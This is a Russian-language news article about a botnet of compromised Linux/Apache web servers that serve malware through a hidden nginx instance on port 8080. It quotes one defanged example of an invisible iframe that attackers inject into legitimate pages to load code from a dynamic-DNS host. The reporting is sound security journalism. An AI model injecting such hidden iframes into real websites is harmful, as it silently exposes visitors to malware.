Зафиксирован ботнет, состоящий из веб-серверов под управлением Linux

Как сообщает ресурс The Register, специалист по вопросам компьютерной безопасности обнаружил кластер инфицированных серверов под управлением операционных систем Linux, объединенных в ботнет, который распространяет вредоносное ПО. Отметим, ранее были зафиксированы ботнеты для платформы Mac, мобильных телефонов и роутеров.

Каждый инфицированный компьютер является выделенным или виртуальным сервером, обслуживающим обычные легитимные сайты. Но в дополнение к основной задаче (веб-сервер Apache) они также были взломаны злоумышленниками и настроены на обслуживание второго веб-сервера nginx, который и распространяет вредоносное ПО. Сервера обслуживают легитимный трафик через порт 80 — стандартный порт TCP, используемый сайтами. Для нужд злоумышленников используется порт 8080, через который передается информация о DNS свободных доменных имен, которые привязываются к IP адресу зараженного компьютера. Далее в обычные сайты скрыто внедряется участок кода, например, нечто вроде <i_frame src="http ://a86x . homeunix . org:8080 /ts/in.cgi? open2" width=997 height=0 style="visibility: hidden"></iframe> (код изменен с целью обеспечения безопасности), который без ведома посетителя сайта обращается к зараженному серверу и способствует распространению вредоносного ПО.

По словам Дениса Синегубко, независимого ИТ-специалиста обнаружившего ботнет, имеется в наличии большая группа связанных зараженных веб-серверов (зомби), которые управляются общим контрольным центром. Кроме того, данный ботнет связан с другим ботнетом, который включает в себя зараженные домашние компьютеры.

На данный момент пока точно неизвестно, как произошло первичное заражение веб-серверов. Делается предположение, что все они обслуживались невнимательными администраторами, которые каким-то образом дали доступ злоумышленникам к своим root паролям. Для внедрения кода iframe в веб-страницы злоумышленники также должны были получить доступ к FTP паролям пользователей.

В настоящее время зафиксировано около 100 зараженных серверов, которые управляются различными версиями Linux и обслуживают веб-сервер Apache. Такой незначительный по масштабам ботнет пока не дает возможности точно определить намерения злоумышленников. В связи с этим существует два предположения:

  1. Злоумышленники лишь протестировали возможность осуществления такой атаки на разные веб-сервера с целью убедиться в работоспособности системы;
  2. На данный момент задействованы еще не все зараженные компьютеры, и злоумышленники выжидают определенного момента для начала крупномасштабной атаки.

После обращения Дениса Синегубко к провайдерам DynDNS.com и No-IP.com, которые используются злоумышленниками для подбора свободных доменных имен, они оперативно отреагировали на предупреждение и закрыли указанные домены. Но Синегубко продолжает фиксировать по два новых IP адреса, используемых хакерами, ежечасно, таким образом, следует ожидать дальнейшего расширения ботнета, что подтверждает справедливость второй гипотезы.